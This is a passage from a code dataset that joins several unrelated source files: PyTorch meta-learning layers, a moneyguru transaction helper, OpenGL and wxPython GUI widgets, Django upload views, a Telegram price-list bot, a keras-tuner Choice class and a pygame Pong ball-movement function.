MetaEmbedding(MetaModule):\r\n \"\"\"docstring for Meta_embedding\"\"\"\r\n\r\n def __init__(self, *args, **kwargs):\r\n super().__init__()\r\n ignore = nn.Embedding(*args, **kwargs)\r\n self.num_embeddings = ignore.num_embeddings\r\n self.embedding_dim = ignore.embedding_dim\r\n self.padding_idx = ignore.padding_idx\r\n self.max_norm = ignore.max_norm\r\n self.norm_type = ignore.norm_type\r\n self.scale_grad_by_freq = ignore.scale_grad_by_freq\r\n self.sparse = ignore.sparse\r\n self.register_buffer('weight', to_var(ignore.weight.data, requires_grad=True))\r\n\r\n def forward(self, x):\r\n return F.embedding(x, self.weight, self.padding_idx, self.max_norm,\r\n self.norm_type, self.scale_grad_by_freq, self.sparse)\r\n\r\n def named_leaves(self):\r\n return [('weight', self.weight)]\r\n\r\n\r\nclass MetaConvTranspose2d(MetaModule):\r\n def __init__(self, *args, **kwargs):\r\n super().__init__()\r\n ignore = nn.ConvTranspose2d(*args, **kwargs)\r\n\r\n self.stride = ignore.stride\r\n self.padding = ignore.padding\r\n self.dilation = ignore.dilation\r\n self.groups = ignore.groups\r\n\r\n self.register_buffer('weight', to_var(ignore.weight.data, requires_grad=True))\r\n\r\n if ignore.bias is not None:\r\n self.register_buffer('bias', to_var(ignore.bias.data, requires_grad=True))\r\n else:\r\n self.register_buffer('bias', None)\r\n\r\n def forward(self, x, output_size=None):\r\n output_padding = self._output_padding(x, output_size)\r\n return F.conv_transpose2d(x, self.weight, self.bias, self.stride, self.padding,\r\n output_padding, self.groups, self.dilation)\r\n\r\n def named_leaves(self):\r\n return 
[('weight', self.weight), ('bias', self.bias)]\r\n\r\n\r\nclass MetaBatchNorm2d(MetaModule):\r\n def __init__(self, *args, **kwargs):\r\n super().__init__()\r\n ignore = nn.BatchNorm2d(*args, **kwargs)\r\n\r\n self.num_features = ignore.num_features\r\n self.eps = ignore.eps\r\n self.momentum = ignore.momentum\r\n self.affine = ignore.affine\r\n self.track_running_stats = ignore.track_running_stats\r\n self.num_batches_tracked = ignore.num_batches_tracked\r\n\r\n if self.affine:\r\n self.register_buffer('weight', to_var(ignore.weight.data, requires_grad=True))\r\n self.register_buffer('bias', to_var(ignore.bias.data, requires_grad=True))\r\n\r\n if self.track_running_stats:\r\n self.register_buffer('running_mean', torch.zeros(ignore.num_features))\r\n self.register_buffer('running_var', torch.ones(ignore.num_features))\r\n else:\r\n self.register_parameter('running_mean', None)\r\n self.register_parameter('running_var', None)\r\n\r\n def forward(self, x):\r\n return F.batch_norm(x, self.running_mean, self.running_var, self.weight, self.bias,\r\n self.training or not self.track_running_stats, self.momentum, self.eps)\r\n\r\n def named_leaves(self):\r\n return [('weight', self.weight), ('bias', self.bias)]\r\n\r\n\r\nclass LeNet(MetaModule):\r\n def __init__(self, n_out):\r\n super(LeNet, self).__init__()\r\n\r\n layers = []\r\n layers.append(MetaConv2d(1, 6, kernel_size=5))\r\n layers.append(nn.ReLU(inplace=True))\r\n layers.append(nn.MaxPool2d(kernel_size=2, stride=2))\r\n\r\n layers.append(MetaConv2d(6, 16, kernel_size=5))\r\n layers.append(nn.ReLU(inplace=True))\r\n layers.append(nn.MaxPool2d(kernel_size=2, stride=2))\r\n\r\n layers.append(MetaConv2d(16, 120, kernel_size=5))\r\n layers.append(nn.ReLU(inplace=True))\r\n\r\n self.main = nn.Sequential(*layers)\r\n\r\n layers = []\r\n layers.append(MetaLinear(120, 84))\r\n layers.append(nn.ReLU(inplace=True))\r\n layers.append(MetaLinear(84, n_out))\r\n\r\n self.fc_layers = nn.Sequential(*layers)\r\n\r\n def forward(self, x):\r\n x = self.main(x)\r\n x = x.view(-1, 120)\r\n return self.fc_layers(x).squeeze()\r\n\r\n\r\nclass Cifar10(nn.Module):\r\n def __init__(self, n_out):\r\n super(Cifar10, self).__init__()\r\n\r\n layers = []\r\n layers.append(nn.Conv2d(3, 32, kernel_size=5))\r\n layers.append(nn.ReLU(inplace=True))\r\n layers.append(nn.MaxPool2d(kernel_size=2, stride=2))\r\n\r\n layers.append(nn.Conv2d(32, 64, kernel_size=5))\r\n layers.append(nn.ReLU(inplace=True))\r\n layers.append(nn.Conv2d(64, 64, kernel_size=5))\r\n layers.append(nn.ReLU(inplace=True))\r\n # layers.append(nn.MaxPool2d(kernel_size=2,stride=2))\r\n\r\n # layers.append(MetaConv2d(16, 120, kernel_size=5))\r\n # layers.append(nn.ReLU(inplace=True))\r\n\r\n self.main = nn.Sequential(*layers)\r\n\r\n layers = []\r\n layers.append(nn.Linear(147456, 512))\r\n layers.append(nn.ReLU(inplace=True))\r\n layers.append(nn.Dropout(p=0.5))\r\n layers.append(nn.Linear(512, n_out))\r\n\r\n self.fc_layers = nn.Sequential(*layers)\r\n\r\n def forward(self, x):\r\n x = self.main(x)\r\n x = x.view(-1, 147456)\r\n return self.fc_layers(x).squeeze()\r\n\r\n\r\nclass Net(MetaModule):\r\n def __init__(self):\r\n super(Net, self).__init__()\r\n self.conv1 = MetaConv2d(3, 32, 5)\r\n self.conv2 = MetaConv2d(32, 64, 5)\r\n self.fc1 = nn.Linear(64 * 5 * 5, 512)\r\n self.drop = nn.Dropout(p=0.5)\r\n self.fc2 = nn.Linear(512, 10)\r\n # self.fc3=nn.Linear(84,10)\r\n\r\n def forward(self, x):\r\n x = F.max_pool2d(F.relu(self.conv1(x)), 2)\r\n x = F.max_pool2d(F.relu(self.conv2(x)), 2)\r\n x = 
x.view(-1, 64 * 5 * 5)\r\n x = F.relu(self.fc1(x))\r\n # x = F.relu(self.fc2(x))\r\n x = self.fc2(x)\r\n return x\r\n\r\n\r\nclass Meta_cifar10(MetaModule):\r\n def __init__(self):\r\n super(Meta_cifar10, self).__init__()\r\n self.conv1 = MetaConv2d(1, 1, 5)\r\n\r\n # self.fc3=nn.Linear(84,10)\r\n\r\n def forward(self, x):\r\n x = F.max_pool2d(F.relu(self.conv1(x)), 2)\r\n return x\r\n\r\n\r\nclass LeNet_original(MetaModule):\r\n def __init__(self, n_out):\r\n super(LeNet_original, self).__init__()\r\n\r\n layers = []\r\n layers.append(nn.Conv2d(1, 6, kernel_size=5))\r\n layers.append(nn.ReLU(inplace=True))\r\n layers.append(nn.MaxPool2d(kernel_size=2, stride=2))\r\n\r\n layers.append(nn.Conv2d(6, 16, kernel_size=5))\r\n layers.append(nn.ReLU(inplace=True))\r\n layers.append(nn.MaxPool2d(kernel_size=2, stride=2))\r\n\r\n layers.append(nn.Conv2d(16, 120, kernel_size=5))\r\n layers.append(nn.ReLU(inplace=True))\r\n\r\n self.main = nn.Sequential(*layers)\r\n\r\n layers = []\r\n layers.append(nn.Linear(120, 84))\r\n layers.append(nn.ReLU(inplace=True))\r\n layers.append(nn.Linear(84, n_out))\r\n\r\n self.fc_layers = nn.Sequential(*layers)\r\n\r\n def forward(self, x):\r\n x = self.main(x)\r\n x = x.view(-1, 120)\r\n return self.fc_layers(x).squeeze()\r\n\r\n\r\nif __name__=='__main__':\r\n model = Meta_cifar10()\r\n print(model.state_dict())","repo_name":"cyang-cityu/MetaCorrection","sub_path":"nets/meta_base.py","file_name":"meta_base.py","file_ext":"py","file_size_in_byte":12039,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"67"} +{"seq_id":"22422663541","text":"from ._ccore import Transaction as _Transaction\n\ndef txn_matches(txn, query):\n \"\"\"Return whether ``txn`` is matching ``query``.\n\n ``query`` is a ``dict`` of all criteria to look for (example: ``{'payee': 'Barber shop'}``.\n List of possible dict keys:\n\n * description\n * payee\n * checkno\n * memo\n * amount\n * account\n * group\n\n All of these queries are string-based, except ``amount``, which requires an\n :class:`.Amount`.\n\n Returns true if any criteria matches, false otherwise.\n \"\"\"\n query_description = query.get('description')\n if query_description is not None:\n if query_description in txn.description.lower():\n return True\n query_payee = query.get('payee')\n if query_payee is not None:\n if query_payee in txn.payee.lower():\n return True\n query_checkno = query.get('checkno')\n if query_checkno is not None:\n if query_checkno == txn.checkno.lower():\n return True\n query_memo = query.get('memo')\n if query_memo is not None:\n for split in txn.splits:\n if query_memo in split.memo.lower():\n return True\n query_amount = query.get('amount')\n if query_amount is not None:\n query_value = float(query_amount) if query_amount else 0\n for split in txn.splits:\n split_value = float(split.amount) if split.amount else 0\n if query_value == abs(split_value):\n return True\n query_account = query.get('account')\n if query_account is not None:\n for split in txn.splits:\n if split.account and split.account.name.lower() in query_account:\n return True\n query_group = query.get('group')\n if query_group is not None:\n for split in txn.splits:\n if split.account and split.account.groupname and \\\n split.account.groupname.lower() in query_group:\n return True\n return False\n\ndef splitted_splits(splits):\n \"\"\"Returns `splits` separated in two groups (\"froms\" and \"tos\").\n\n \"froms\" are splits with a negative amount and \"tos\", the positive ones. 
Null splits are\n generally sent to the \"froms\" side, unless \"tos\" is empty.\n\n Returns ``(froms, tos)``.\n \"\"\"\n null_amounts = [s for s in splits if s.amount == 0]\n froms = [s for s in splits if s.amount < 0]\n tos = [s for s in splits if s.amount > 0]\n if not tos and null_amounts:\n tos.append(null_amounts.pop())\n froms += null_amounts\n return froms, tos\n\ndef Transaction(date, description=None, payee=None, checkno=None, account=None, amount=None):\n return _Transaction(1, date, description, payee, checkno, account, amount)\n","repo_name":"sebkoller/moneyguru","sub_path":"core/model/transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"40163280788","text":"from bgl import *\r\nfrom .widget import *\r\nfrom math import cos, sin\r\n# 2x2 alternating block, starting with empty\r\npat = [ 51,51,51,51,\r\n\t\t51,51,51,51,\r\n\t\t204,204,204,204,\r\n\t\t204,204,204,204,\r\n\t\t51,51,51,51,\r\n\t\t51,51,51,51,\r\n\t\t204,204,204,204,\r\n\t\t204,204,204,204,\r\n\t\t51,51,51,51,\r\n\t\t51,51,51,51,\r\n\t\t204,204,204,204,\r\n\t\t204,204,204,204,\r\n\t\t51,51,51,51,\r\n\t\t51,51,51,51,\r\n\t\t204,204,204,204,\r\n\t\t204,204,204,204,\r\n\t\t51,51,51,51,\r\n\t\t51,51,51,51,\r\n\t\t204,204,204,204,\r\n\t\t204,204,204,204,\r\n\t\t51,51,51,51,\r\n\t\t51,51,51,51,\r\n\t\t204,204,204,204,\r\n\t\t204,204,204,204,\r\n\t\t51,51,51,51,\r\n\t\t51,51,51,51,\r\n\t\t204,204,204,204,\r\n\t\t204,204,204,204,\r\n\t\t51,51,51,51,\r\n\t\t51,51,51,51,\r\n\t\t204,204,204,204,\r\n\t\t204,204,204,204,]\r\n\r\n\r\nclass Frame(Widget):\r\n\t\"\"\"Frame for storing other widgets\"\"\"\r\n\ttheme_section = 'Frame'\r\n\ttheme_options = {'Color1': (1, 1, 1, 1),\r\n\t\t\t\t\t 'Color2': (0, 0, 1, 1),\r\n\t\t\t\t\t 'Color3': (0, 0, 1, 1),\r\n\t\t\t\t\t 'Color4': (0, 0, 1, 1),\r\n\t\t\t\t\t 'BorderSize': 0,\r\n\t\t\t\t\t 'BorderColor': (0, 0, 0, 1)\r\n\t\t\t\t}\r\n\r\n\tdef __init__(self, parent, name, border=None, size=[1, 1], pos=[0,0],offset=[0,0],\r\n\t\t\t\tsub_theme='', padding = 0, radius = 0, stipple = False, options=BGUI_NONE):\r\n\t\t\"\"\"\r\n\t\t:param parent: the widget's parent\r\n\t\t:param name: the name of the widget\r\n\t\t:param border: the size of the border around the frame (0 for no border)\r\n\t\t:param size: a tuple containing the width and height\r\n\t\t:param pos: a tuple containing the x and y position\r\n\t\t:param sub_theme: name of a sub_theme defined in the theme file (similar to CSS classes)\r\n\t\t:param options: various other options\r\n\r\n\t\t\"\"\"\r\n\t\tself.padding = padding\r\n\t\tself.stipple = stipple\r\n\t\tself.radius = radius\r\n\r\n\t\tWidget.__init__(self, parent, name, size, pos, offset, sub_theme, options)\r\n\r\n\t\tself._colors = [\r\n\t\t\t\tself.theme['Color1'],\r\n\t\t\t\tself.theme['Color2'],\r\n\t\t\t\tself.theme['Color3'],\r\n\t\t\t\tself.theme['Color4']\r\n\t\t\t\t]\r\n\r\n\t\tself.border_color = self.theme['BorderColor']\r\n\r\n\t\tif border is not None:\r\n\t\t\tself._border = border\r\n\t\telse:\r\n\t\t\tself._border = self.theme['BorderSize']\r\n\r\n\r\n\t@property\r\n\tdef colors(self):\r\n\t\t\"\"\"The colors for the four corners of the frame.\"\"\"\r\n\t\treturn self._colors\r\n\r\n\t@colors.setter\r\n\tdef colors(self, value):\r\n\t\tself._colors = value\r\n\r\n\t@property\r\n\tdef border(self):\r\n\t\t\"\"\"The size of the border around the frame.\"\"\"\r\n\t\treturn self._border\r\n\r\n\t@border.setter\r\n\tdef 
border(self, value):\r\n\t\tself._border = value\r\n\r\n\r\n\r\n\r\n\tdef _draw(self):\r\n\t\t\"\"\"Draw the frame\"\"\"\r\n\r\n\t\tdef drawRoundedRectangle(x, y, w, h, radius, color, res = 8, line = False):\r\n\t\t\tM_PI = 3.141592653589793238462643383279502\r\n\r\n\t\t\tglColor4f(*color)\r\n\t\t\tif line:\r\n\t\t\t\tglBegin(GL_LINE_STRIP)\r\n\t\t\telse:\r\n\t\t\t\tglBegin(GL_POLYGON)\r\n\t\t\tglVertex2f(x+radius,y)\r\n\t\t\tglVertex2f(x+w-radius,y)\r\n\t\t\ti = M_PI*1.5\r\n\t\t\twhile i < M_PI*2.0:\r\n\t\t\t\ti += M_PI / res\r\n\t\t\t\tglVertex2f(x+w-radius+cos(i)*radius,y+radius+sin(i)*radius)\r\n\t\t\tglVertex2f(x+w,y+radius)\r\n\t\t\tglVertex2f(x+w,y+h-radius)\r\n\t\t\ti = 0\r\n\t\t\twhile i < M_PI*0.5:\r\n\t\t\t\ti += M_PI / res\r\n\t\t\t\tglVertex2f(x+w-radius+cos(i)*radius,y+h-radius+sin(i)*radius)\r\n\t\t\tglVertex2f(x+w-radius,y+h)\r\n\t\t\tglVertex2f(x+radius,y+h)\r\n\t\t\ti = M_PI*0.5\r\n\t\t\twhile i < M_PI:\r\n\t\t\t\ti += M_PI / res\r\n\t\t\t\tglVertex2f(x+radius+cos(i)*radius,y+h-radius+sin(i)*radius)\r\n\t\t\tglVertex2f(x,y+h-radius)\r\n\t\t\tglVertex2f(x,y+radius)\r\n\t\t\ti = M_PI\r\n\t\t\twhile i < M_PI*1.5:\r\n\t\t\t\ti += M_PI / res\r\n\t\t\t\tglVertex2f(x+radius+cos(i)*radius,y+radius+sin(i)*radius)\r\n\t\t\tglEnd()\r\n\r\n\r\n\t\t# Enable alpha blending\r\n\t\tglEnable(GL_BLEND)\r\n\t\tglBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\r\n\r\n\t\t# Enable polygon offset\r\n\t\tglEnable(GL_POLYGON_OFFSET_FILL)\r\n\t\tglPolygonOffset(1.0, 1.0)\r\n\r\n\t\tpadx = [self.padding, -self.padding, -self.padding, self.padding]\r\n\t\tpady = [self.padding, self.padding, -self.padding, -self.padding]\r\n\r\n\r\n\t\tif self.stipple:\r\n\t\t\tstipplePattern = Buffer(GL_BYTE, 4*32, pat)\r\n\t\t\tglEnable(GL_POLYGON_STIPPLE)\r\n\t\t\tglPolygonStipple(stipplePattern)\r\n\r\n\t\tif self.radius:\r\n\t\t\tw = self.gl_position[1][0] - self.gl_position[0][0]\r\n\t\t\th = self.gl_position[2][1] - self.gl_position[1][1]\r\n\t\t\tdrawRoundedRectangle(self.gl_position[0][0], self.gl_position[0][1], w, h, self.radius, self.colors[0])\r\n\t\t\tif self.border:\r\n\t\t\t\tglLineWidth(self.border)\r\n\t\t\t\tdrawRoundedRectangle(self.gl_position[0][0], self.gl_position[0][1], w, h, self.radius, self.border_color, line = True)\r\n\t\t\t\tglLineWidth(1.0)\r\n\t\telse:\r\n\t\t\tglBegin(GL_QUADS)\r\n\t\t\tfor i in range(4):\r\n\t\t\t\tglColor4f(self.colors[i][0], self.colors[i][1], self.colors[i][2], self.colors[i][3])\r\n\t\t\t\tglVertex2f(self.gl_position[i][0]+padx[i], self.gl_position[i][1]+pady[i])\r\n\t\t\tglEnd()\r\n\r\n\t\tif self.stipple:\r\n\t\t\tglDisable(GL_POLYGON_STIPPLE)\r\n\r\n\t\tglDisable(GL_POLYGON_OFFSET_FILL)\r\n\r\n\t\t# Draw an outline\r\n\t\tif self.border > 0 and not self.radius:\r\n\t\t\tr, g, b, a = self.border_color\r\n\t\t\tglColor4f(r, g, b, a)\r\n\t\t\tglPolygonMode(GL_FRONT, GL_LINE)\r\n\t\t\tglLineWidth(self.border)\r\n\r\n\t\t\tglBegin(GL_QUADS)\r\n\t\t\tfor i in range(4):\r\n\t\t\t\tglVertex2f(self.gl_position[i][0], self.gl_position[i][1])\r\n\r\n\t\t\tglEnd()\r\n\r\n\t\t\tglLineWidth(1.0)\r\n\t\t\tglPolygonMode(GL_FRONT, GL_FILL)\r\n\r\n\t\tglDisable(GL_BLEND)\r\n\t\tWidget._draw(self)\r\n\r\n","repo_name":"MolecularFlipbook/FlipbookApp","sub_path":"mfb/ge/bgui/frame.py","file_name":"frame.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"67"} +{"seq_id":"22784336589","text":"# coding: utf-8\n\"\"\"browser.py -- Browser window in visualizer application\n\"\"\"\nfrom logging 
import debug\n\nimport wx\nfrom ec4vis import *\n\nfrom render_window import RenderWindowPanel\nfrom control_panel import ControlPanel\nfrom menu_bar import AppMenuBar\n \n\nclass BrowserFrame(wx.Frame):\n \"\"\"Browser window.\n \"\"\"\n def __init__(self, *args, **kwargs):\n \"\"\"Initializer.\n \"\"\"\n wx.Frame.__init__(self, *args, **kwargs)\n # render window\n render_window_panel = RenderWindowPanel(self, -1)\n # control panel\n control_panel = ControlPanel(self, -1)\n # menu\n menu_bar = AppMenuBar(self)\n # bindings\n self.render_window_panel = render_window_panel\n self.control_panel = control_panel\n self.menu_bar = menu_bar\n # sizer\n root_sizer = wx.BoxSizer(wx.HORIZONTAL)\n root_sizer.Add(render_window_panel, 1, wx.ALL|wx.EXPAND, 0)\n root_sizer.Add(control_panel, 0, wx.ALL|wx.EXPAND, 0)\n self.SetSizer(root_sizer)\n self.Layout()\n\n\nif __name__=='__main__':\n class App(wx.App):\n \"\"\"Demonstrative application.\n \"\"\"\n def OnInit(self):\n \"\"\"Initializer.\n \"\"\"\n frame = BrowserFrame(None, -1, u'Browser Frame Demo')\n frame.Show(True)\n self.SetTopWindow(frame)\n return True\n app = App(0)\n app.MainLoop()\n","repo_name":"ecell/newio","sub_path":"ec4vis/ec4vis/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"7872800406","text":"from django.shortcuts import render, get_object_or_404\nfrom django.contrib.auth import get_user_model\nfrom rest_framework import generics, permissions, viewsets\nfrom rest_framework_simplejwt.views import TokenObtainPairView\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\n\nfrom .serializers import LogInSerializer, UserSerializer, ProfileSerializer\nfrom .models import Upload, UploadPrivate\n\n\n\n\nclass SignUpView(generics.CreateAPIView):\n queryset = get_user_model().objects.all()\n serializer_class = UserSerializer\n\nclass LogInView(TokenObtainPairView):\n serializer_class = LogInSerializer\n\nclass ProfileView(generics.RetrieveUpdateAPIView):\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = ProfileSerializer\n\n def get_queryset(self):\n return get_user_model().objects.filter(username=self.request.user.username)\n \n def get_object(self):\n queryset = self.get_queryset()\n obj = get_object_or_404(queryset)\n return obj\n \n\ndef image_upload(request):\n if request.method == 'POST':\n image_file = request.FILES['image_file']\n image_type = request.POST['image_type']\n if settings.USE_S3:\n if image_type == 'private':\n upload = UploadPrivate(file=image_file)\n else:\n upload = Upload(file=image_file)\n upload.save()\n image_url = upload.file.url\n else:\n fs = FileSystemStorage()\n filename = fs.save(image_file.name, image_file)\n image_url = fs.url(filename)\n return render(request, 'upload.html', {\n 'image_url': image_url\n })\n return render(request, 'upload.html')\n","repo_name":"alaeddine-13/taxim","sub_path":"server/taxi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38051531122","text":"import logging\n\nfrom aiogram import types, Dispatcher\nfrom aiogram.dispatcher.filters import Text\nfrom loguru import logger\n\nfrom config import web_buttons, OWNER\nfrom create_bot import bot\n\n\nasync def web_lab(message: types.Message):\n try:\n owner: types.ChatMember = await 
bot.get_chat_member(OWNER, OWNER)\n await message.answer(\n 'Хей. А ось і прайс лист для Вашої Лабораторної роботи, будем раді вашому замовлені ^^\\n\\n'\n 'Вся Лабораторна - 800грн\\n\\n'\n f'Якщо вас цікавить тільки якась частина, тоді пишить - {owner.user.mention} (для замовлення також)'\n )\n except Exception as e:\n logger.exception(e)\n\n\nasync def web_pract(message: types.Message):\n try:\n owner: types.ChatMember = await bot.get_chat_member(OWNER, OWNER)\n await message.answer(\n 'Хей. А ось і прайс лист для Вашої Практичної роботи, будем раді вашому замовлені ^^\\n\\n'\n ''\n 'Лабораторна №1 - 150грн\\n'\n 'Лабораторна №2 - 150грн\\n'\n 'Лабораторна №3 - 200грн\\n'\n 'Лабораторна №4 - 150грн\\n'\n 'Лабораторна №5 - 200грн\\n'\n 'Лабораторна №6 - 250грн\\n'\n 'Лабораторна №7 - 400грн\\n'\n 'Лабораторна №8 - 350грн\\n'\n 'Лабораторна №9 - 400грн'\n '\\n\\n'\n f'Для замовлення пишить - {owner.user.mention}'\n )\n except Exception as e:\n logger.exception(e)\n\n\ndef register_message_handler_web(dp: Dispatcher):\n dp.register_message_handler(\n web_lab,\n Text(equals=web_buttons[0])\n )\n\n dp.register_message_handler(\n web_pract,\n Text(equals=web_buttons[1])\n )\n","repo_name":"zakharfsk/eazylab_bot","sub_path":"handlers/handler_price_web.py","file_name":"handler_price_web.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"5866888999","text":"import six\n\nfrom keras_tuner import protos\nfrom keras_tuner.api_export import keras_tuner_export\nfrom keras_tuner.engine import conditions as conditions_mod\nfrom keras_tuner.engine.hyperparameters import hp_utils\nfrom keras_tuner.engine.hyperparameters import hyperparameter\n\n\n@keras_tuner_export(\"keras_tuner.engine.hyperparameters.Choice\")\nclass Choice(hyperparameter.HyperParameter):\n \"\"\"Choice of one value among a predefined set of possible values.\n\n Args:\n name: A string. the name of parameter. Must be unique for each\n `HyperParameter` instance in the search space.\n values: A list of possible values. Values must be int, float,\n str, or bool. All values must be of the same type.\n ordered: Optional boolean, whether the values passed should be\n considered to have an ordering. Defaults to `True` for float/int\n values. 
Must be `False` for any other values.\n default: Optional default value to return for the parameter.\n If unspecified, the default value will be:\n - None if None is one of the choices in `values`\n - The first entry in `values` otherwise.\n \"\"\"\n\n def __init__(self, name, values, ordered=None, default=None, **kwargs):\n super().__init__(name=name, default=default, **kwargs)\n if not values:\n raise ValueError(\"`values` must be provided for `Choice`.\")\n\n # Type checking.\n types = {type(v) for v in values}\n if len(types) > 1:\n raise TypeError(\n \"A `Choice` can contain only one type of value, \"\n f\"found values: {str(values)} with types {types}.\"\n )\n\n # Standardize on str, int, float, bool.\n if isinstance(values[0], six.string_types):\n values = [str(v) for v in values]\n if default is not None:\n default = str(default)\n elif isinstance(values[0], six.integer_types):\n values = [int(v) for v in values]\n if default is not None:\n default = int(default)\n elif not isinstance(values[0], (bool, float)):\n raise TypeError(\n \"A `Choice` can contain only `int`, `float`, `str`, or \"\n \"`bool`, found values: \" + str(values) + \"with \"\n \"types: \" + str(type(values[0]))\n )\n self._values = values\n\n if default is not None and default not in values:\n raise ValueError(\n \"The default value should be one of the choices. \"\n f\"You passed: values={values}, default={default}\"\n )\n self._default = default\n\n # Get or infer ordered.\n self.ordered = ordered\n is_numeric = isinstance(values[0], (six.integer_types, float))\n if self.ordered and not is_numeric:\n raise ValueError(\"`ordered` must be `False` for non-numeric types.\")\n if self.ordered is None:\n self.ordered = is_numeric\n\n def __repr__(self):\n return (\n f\"Choice(name: '{self.name}', \"\n + f\"values: {self._values}, \"\n + f\"ordered: {self.ordered}, default: {self.default})\"\n )\n\n @property\n def values(self):\n return self._values\n\n @property\n def default(self):\n return self._values[0] if self._default is None else self._default\n\n def prob_to_value(self, prob):\n return self._values[hp_utils.prob_to_index(prob, len(self._values))]\n\n def value_to_prob(self, value):\n return hp_utils.index_to_prob(\n self._values.index(value), len(self._values)\n )\n\n def get_config(self):\n config = super().get_config()\n config[\"values\"] = self._values\n config[\"ordered\"] = self.ordered\n return config\n\n @classmethod\n def from_proto(cls, proto):\n values = [getattr(val, val.WhichOneof(\"kind\")) for val in proto.values]\n default = getattr(proto.default, proto.default.WhichOneof(\"kind\"), None)\n conditions = [\n conditions_mod.Condition.from_proto(c) for c in proto.conditions\n ]\n return cls(\n name=proto.name,\n values=values,\n ordered=proto.ordered,\n default=default,\n conditions=conditions,\n )\n\n def to_proto(self):\n if isinstance(self.values[0], six.string_types):\n values = [\n protos.get_proto().Value(string_value=v) for v in self.values\n ]\n default = protos.get_proto().Value(string_value=self.default)\n elif isinstance(self.values[0], six.integer_types):\n values = [\n protos.get_proto().Value(int_value=v) for v in self.values\n ]\n default = protos.get_proto().Value(int_value=self.default)\n else:\n values = [\n protos.get_proto().Value(float_value=v) for v in self.values\n ]\n default = protos.get_proto().Value(float_value=self.default)\n return protos.get_proto().Choice(\n name=self.name,\n ordered=self.ordered,\n values=values,\n default=default,\n conditions=[c.to_proto() for c 
in self.conditions],\n )\n","repo_name":"keras-team/keras-tuner","sub_path":"keras_tuner/engine/hyperparameters/hp_types/choice_hp.py","file_name":"choice_hp.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","stars":2783,"dataset":"github-code","pt":"67"} +{"seq_id":"1819329391","text":"# Import required packages\nimport random\nimport pygame\n\n# Import Parameters\nimport pygame.time\n\nfrom parameters import *\n\n\n# Define collision function\ndef collision(left_paddle, right_paddle, ball):\n '''\n ball (Ball): The ball object of class Ball\n left_paddle (PaddleLeft): The left paddle object of class Paddle\n right_paddle (PaddleRigth): The right paddle object of class Paddle\n\n Returns:\n Boolean value for collision\n '''\n\n # Define object position\n ball_position = ball.get_position()\n ball_radius = ball.get_size()\n pl_top_position = left_paddle.top_right[1]\n pl_down_position = left_paddle.down_right[1]\n pl_right_position = left_paddle.down_right[0]\n pr_top_position = right_paddle.top_left[1]\n pr_down_position = right_paddle.down_left[1]\n pr_left_position = right_paddle.down_left[0]\n\n # Return True if collision has occured\n if ball_position[0] - ball_radius <= pl_right_position and \\\n pl_down_position <= ball_position[1] <= pl_top_position:\n return True\n\n # Return True if collision has occured\n if ball_position[0] + ball_radius >= pr_left_position and \\\n pr_down_position <= ball_position[1] <= pr_top_position:\n return True\n\n # Return False otherwise\n else:\n return False\n\n\n# Define a function to control movement of ball\ndef ball_movement(\n x_direction, y_direction, ball, score, left_paddle, right_paddle, score_time,\n pong_sound, win_sound, loss_sound, goal_sound, edge_sound):\n '''\n x_direction (int): Integer defining the movement direction on x axis\n y_direction (int): Integer defining the movement direction on y axis\n height (int): Defines the height of the playing window\n width (int): Defines the width of the playing window\n ball (Ball): The ball object of class Ball\n score (list): A list with two elements, the score of left and right players\n left_paddle (PaddleLeft): The left paddle object of class Paddle\n right_paddle (PaddleRight): The right paddle object of class Paddle\n score_time (double or None): Time when last goal was scored\n pong_sound (WAV): Sound when ball hits paddle\n win_sound (WAV): Sound when player wins\n loss_sound(WAV): Sound when player loses\n goal_sound(WAV): Sound when goal is scored\n edge_sound(WAV): Sound when upper or lower edge is hit\n\n Returns:\n y_direction (int): Movement direction on y-axis after checking all conditions\n x_direction (int): Movement direction on x-axis after checking all conditions\n score (list): Contains the scores of each player\n score_time (double or None): Time when last goal was scored. 
\n '''\n\n # New Ball position\n ball.set_position(x_direction, y_direction)\n\n # If ball touches upper edge\n if ball.get_position()[1] + ball.get_size() > HEIGHT:\n # edge sound\n pygame.mixer.Sound.play(edge_sound)\n # invert y movement\n y_direction = y_direction * -1\n return x_direction, y_direction, score, score_time\n\n # If ball touches lower edge\n elif ball.get_position()[1] - ball.get_size() < 0:\n # edge sound\n pygame.mixer.Sound.play(edge_sound)\n # invert y movement\n y_direction = y_direction * -1\n return x_direction, y_direction, score, score_time\n\n # If player scores\n elif ball.get_position()[0] - ball.get_size() > WIDTH:\n # Increase score of right player\n score[0] += 1\n # Play sound for goal\n if score[0] != POINTS_TO_WIN:\n pygame.mixer.Sound.play(goal_sound)\n # Play different sound if goal means loss\n if score[0] == POINTS_TO_WIN:\n pygame.mixer.Sound.play(win_sound)\n # get score time\n score_time = pygame.time.get_ticks()\n x_direction = random.sample([1, -1], 1)[0] * 1.5 # Horizontal movement (left or right)\n y_direction = random.sample([random.uniform(-1, -0.5), random.uniform(0.5, 1)], 1)[0] * 1.5 # Vertical movement (down or up)\n\n return x_direction, y_direction, score, score_time\n\n # If player gets scored on\n elif ball.get_position()[0] + ball.get_size() < 0:\n # Increase score of right player\n score[1] += 1\n # Play sound for goal\n if score[1] != POINTS_TO_WIN:\n pygame.mixer.Sound.play(goal_sound)\n # Play sound if goal means loss\n if score[1] == POINTS_TO_WIN:\n pygame.mixer.Sound.play(loss_sound)\n # get score time\n score_time = pygame.time.get_ticks()\n x_direction = random.sample([1, -1], 1)[0] * 1.5 # Horizontal movement (left or right)\n y_direction = random.sample([random.uniform(-1, -0.5), random.uniform(0.5, 1)], 1)[0] * 